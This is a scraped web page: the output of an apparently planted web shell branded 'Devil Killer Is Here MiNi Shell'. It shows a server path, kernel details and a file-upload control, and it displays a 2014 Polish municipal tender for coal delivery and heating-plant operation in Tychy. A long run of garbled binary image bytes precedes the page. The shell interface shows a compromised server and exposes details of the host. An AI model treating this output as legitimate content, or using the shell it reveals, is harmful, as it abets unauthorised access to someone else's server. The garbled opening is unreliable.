JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140829/287400-N-2014.html

<p class="kh_header"><b>Tychy: Dostawa węgla kamiennego energetycznego typu GROSZEK EKO
      wraz ze świadczeniem usług w zakresie utrzymania całodobowego ruchu cieplnego 
      w kotłowniach węglowych oraz gazowych w nieruchomościach administrowanych 
      przez ROM I i ROM II w Tychach</b><br>
<b>Numer ogłoszenia: 287400 - 2014; data zamieszczenia: 29.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa węgla kamiennego energetycznego typu GROSZEK EKO
      wraz ze świadczeniem usług w zakresie utrzymania całodobowego ruchu cieplnego 
      w kotłowniach węglowych oraz gazowych w nieruchomościach administrowanych 
      przez ROM I i ROM II w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa węgla kamiennego energetycznego typu  GROSZEK  EKO wraz ze świadczeniem usług w zakresie utrzymania całodobowego ruchu cieplnego w kotłowniach węglowych oraz gazowych w nieruchomościach administrowanych przez ROM I  i ROM II w Tychach

2.	Zamówienie podzielone jest na 2 części zwane dalej zadaniami: 

      ZADANIE Nr 1 -   Dostawa węgla kamiennego energetycznego typu  GROSZEK  EKO 
      wraz ze świadczeniem usług w zakresie utrzymania całodobowego ruchu cieplnego w 
      kotłowniach węglowych oraz gazowych w nieruchomościach administrowanych przez ROM I 
      Zakres zamówienia obejmuje:
   1) Dostawę 59 ton węgla kamiennego energetycznego typu GROSZEK EKO wraz z 
       transportem do kotłowni węglowych w budynkach przy ul. Jankowickiej 2, ul.Jankowickiej 4 
       i ul. Szkolnej 70
       Orientacyjne zużycie węgla kamiennego energetycznego typu GROSZEK EKO przez 
       poszczególne kotłownie przez okres realizacji zamówienia:
    -   kotłownia w budynku przy ul. Jankowickiej 2  - 19 ton 
         -  kotłownia w budynku, przy ul. Szkolnej 70     -  17 ton 
         -  kotłownia w budynku, przy ul. Jankowickiej 4 -  23 tony 
     Wymagane parametry węgla:
         Węgiel kamienny energetyczny typu GROSZEK EKO 31,2 płukany, klasy 26/050/06 
          sortymentu 0223/cc o następujących  parametrach:
         -   granulacja 5 - 20 mm, 
         -   średnie do wysokiej zawartości części lotnych 28%  - 40%,
         -   wilgotność mniejsza niż 15%,
         -   temperatura topnienia popiołu powyżej 1150 stopni C,
         -   zawartość miału do 10% (granulacja ziarna poniżej 4mm).
          Zamawiający dopuszcza możliwość dostawy węgla o parametrach technicznych innych, 
          lecz nie gorszych niż podane przez Zamawiającego.
    Dostawa węgla do  kotłowni węglowych winna być realizowana etapami, po uprzednim 
       	 każdorazowym telefonicznym zamówieniu przez upoważnionego pracownika ze strony 
          Zamawiającego. 
          Jednorazowa dostawa węgla nie powinna przekroczyć 10 ton.
          Przewidywany termin pierwszej dostawy:  wrzesień 2014r. 
2)	 Utrzymanie całodobowego ruchu cieplnego w kotłowniach węglowych w budynkach
       mieszkalnych - wielorodzinnych przy ul. Jankowickiej 2 , ul. Jankowickiej 4 i ul Szkolnej 70 
       w Tychach
3)	 Utrzymanie całodobowego ruchu cieplnego w kotłowni gazowej w budynku mieszkalnym -
      wielorodzinnym przy ul. Browarowej 4
4)	Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1/ROM I 
         do SIWZ i do wzoru umowy

      ZADANIE Nr 2 -  Dostawa węgla kamiennego energetycznego typu GROSZEK  EKO         
      wraz ze świadczeniem usług w zakresie utrzymania całodobowego ruchu cieplnego w 
      kotłowniach węglowych oraz gazowych w nieruchomościach administrowanych przez ROM II 

       Zakres zamówienia obejmuje:
1)	Dostawę 10 ton węgla kamiennego energetycznego typu GROSZEK EKO wraz z 
     transportem do kotłowni węglowej w budynkach przy ul. Nowokościelnej 27.
        Orientacyjne zużycie węgla typu GROSZEK EKO przez kotłownię przez
        okres realizacji zamówienia wynosi 10 ton.
     Wymagane parametry węgla:
         Węgiel kamienny energetyczny typu GROSZEK EKO 31,2 płukany, klasy 26/050/06 
          sortymentu 0223/cc o następujących  parametrach:
         -   granulacja 5 - 20 mm, 
         -   średnie do wysokiej zawartości części lotnych 28%  - 40%,
         -   wilgotność mniejsza niż 15%,
         -   temperatura topnienia popiołu powyżej 1150 stopni C,
         -   zawartość miału do 10% (granulacja ziarna poniżej 4mm).
          Zamawiający dopuszcza możliwość dostawy węgla o parametrach technicznych innych, 
          lecz nie gorszych niż podane przez Zamawiającego.
    Dostawa węgla do  kotłowni winna być realizowana etapami, po uprzednim 
       	 każdorazowym telefonicznym zamówieniu przez upoważnionego pracownika ze strony 
          Zamawiającego. 
          Jednorazowa dostawa węgla nie powinna przekroczyć 5 ton.
          Przewidywany termin pierwszej dostawy:  wrzesień 2014r. 
2)	  Utrzymanie całodobowego ruchu cieplnego w kotłowni węglowej w budynku
       mieszkalnym - wielorodzinnym przy ul. Norwida 44 w Tychach
3)	 Utrzymanie całodobowego ruchu cieplnego w kotłowni gazowej w budynku użyteczności 
       publicznej przy ul. Nowokościelnej 27 w Tychach.
 4) Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1/ROM II 
     do SIWZ i do wzoru umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia 
     z wolnej ręki, stanowiących  nie więcej niż 20 % wartości zamówienia podstawowego dla 
     dostaw na zasadach określonych w art. 67 ust.1. pkt 7) oraz zamówień stanowiących nie 
     więcej niż  50 %  wartości zamówienia podstawowego dla usług na zasadach określonych 
     w art. 67 ust.1. pkt 6) ustawy - PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.11.12.10-5, 50.72.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium. Wadium należy  wnieść na wybrane zadanie  - na czas związania ofertą. 
2.	Przy wnoszeniu wadium wykonawca winien powołać się na nazwę wybranego zadania.      Wymagane kwoty wadium w podziale na zadania:
     ZADANIE NR 1 -  wadium  wynosi: 2 200,00 zł    (słownie: dwa tysiące dwieście złotych )

     ZADANIE NR 2 - wadium   wynosi: 700,00 zł    (słownie: siedemset złotych)
3.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Bank PKO S.A.  o / Tychy
Nr rachunku bankowego: 71 1020 2528 0000 0202 0267 3846
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia   wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4), natomiast kopię dowodu wniesienia wadium należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym 
    zakresie sposobu oceny spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania
   wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia 
   następujących dokumentów: 
         wykaz wykonanych, a przypadku świadczeń okresowych lub ciągłych również  
         wykonanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem 
         terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym         
         okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz 
         których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane 
         lub są wykonywane należycie.       
   Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że wykonał                     
   z należytą starannością:
    dla  ZADANIA Nr 1  -  należy wykazać co najmniej jedną usługę w zakresie obsługi 
    instalacji grzewczych w kotłowni wraz z dostawą węgla kamiennego (zrealizowanych 
    w ramach jednej umowy) o wartości ogółem nie mniejszej niż 80 000,00 zł (brutto)





    dla  ZADANIA Nr 2  -  należy wykazać co najmniej jedną usługę w zakresie obsługi 
    instalacji grzewczych w kotłowni wraz z dostawą węgla kamiennego (zrealizowanych 
    w ramach jednej umowy) o wartości ogółem nie mniejszej niż  29 000,00 zł (brutto)

   2)  Do wykazu należy dołączyć dowody, czy w/w dostawy zostały lub są wykonywane
        należycie. 
        Dowodami, o których mowa powyżej są:
a)	poświadczenie, z tym że  w odniesieniu do nadal wykonywanych dostaw lub usług 
    okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące 
    przed upływem terminu składania ofert
b) w przypadku zamówień na roboty budowlane - inne dokumenty -  jeżeli z uzasadnionych 
    przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, 
    którym mowa w pkt 2a) 
c) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
    wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 2a)


         Wykonawca w miejsce poświadczeń, o których mowa w pkt 2) może przedłożyć inne        
         dokumenty potwierdzające , że dostawy wskazane w wykazie zostały wykonane należycie.
         Wykaz dostaw należy sporządzić wg wzoru druku stanowiącego załącznik nr 4 do SIWZ     

        (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
         spełniać łącznie lub co najmniej jeden z Wykonawców ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym 
    zakresie sposobu oceny spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania
    osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
    Zamawiający wymaga następujących dokumentów:

1)	Oświadczenie, że Wykonawca dysponuje co najmniej jedną osobą posiadającą  
    uprawnienia do pracy na stanowisku eksploatacji w zakresie obsługi , konserwacji, 
    remontów, montażu urządzeń wytwarzających , przetwarzających, przesyłających ciepło 
    oraz innych urządzeń energetycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania
         wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt  4 ustawy - PZP), 
         Zamawiający wymaga, złożenia następujących dokumentów: 
1)	   opłaconej polisy, a w przypadku jej braku,  innego dokumentu potwierdzającego, że 
   wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
         działalności związanej z przedmiotem zamówienia. 
         Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
         musi wynikać z treści dokumentu.
        Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca 
         jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
         związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
         dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
         opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku 
       stanowiącego załącznik nr 2 do SIWZ;
2)	  wypełniony i podpisany formularz oferty cenowej - sporządzony wg wzoru druku 
           stanowiącego załącznik nr 2a do SIWZ;
3)   stosowne pełnomocnictwo (a) do działania w imieniu Wykonawcy w przypadku, gdy  
           upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie 
           odpisu z właściwego rejestru;
4)    w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, 
       dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu   
       o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
       w sprawie niniejszego zamówienia publicznego;
5)	  dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
       1) zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT
       2) zmiany osoby pełniącej nadzór nad realizacją umowy
3) zmian personalnych, adresowych, formy prawnej stron umowy
4) zmiany sposobu i terminu rozliczeń</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http: // bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , kod 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2014 godzina 10:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  kod 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1 -   Dostawa węgla kamiennego energetycznego typu GROSZEK  EKO 
      wraz ze świadczeniem usług w zakresie utrzymania całodobowego ruchu cieplnego w 
      kotłowniach węglowych oraz gazowych w nieruchomościach administrowanych przez ROM I 
      Zakres zamówienia obejmuje:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
   1) Dostawę 59 ton węgla kamiennego energetycznego typu GROSZEK EKO wraz z 
       transportem do kotłowni węglowych w budynkach przy ul. Jankowickiej 2, ul.Jankowickiej 4 
       i ul. Szkolnej 70
       Orientacyjne zużycie węgla kamiennego energetycznego typu GROSZEK EKO przez 
       poszczególne kotłownie przez okres realizacji zamówienia:
    -   kotłownia w budynku przy ul. Jankowickiej 2  - 19 ton 
         -  kotłownia w budynku, przy ul. Szkolnej 70     -  17 ton 
         -  kotłownia w budynku, przy ul. Jankowickiej 4 -  23 tony 
     Wymagane parametry węgla:
         Węgiel kamienny energetyczny typu GROSZEK EKO 31,2 płukany, klasy 26/050/06 
          sortymentu 0223/cc o następujących  parametrach:
         -   granulacja 5 - 20 mm, 
         -   średnie do wysokiej zawartości części lotnych 28%  - 40%,
         -   wilgotność mniejsza niż 15%,
         -   temperatura topnienia popiołu powyżej 1150 stopni C,
         -   zawartość miału do 10% (granulacja ziarna poniżej 4mm).
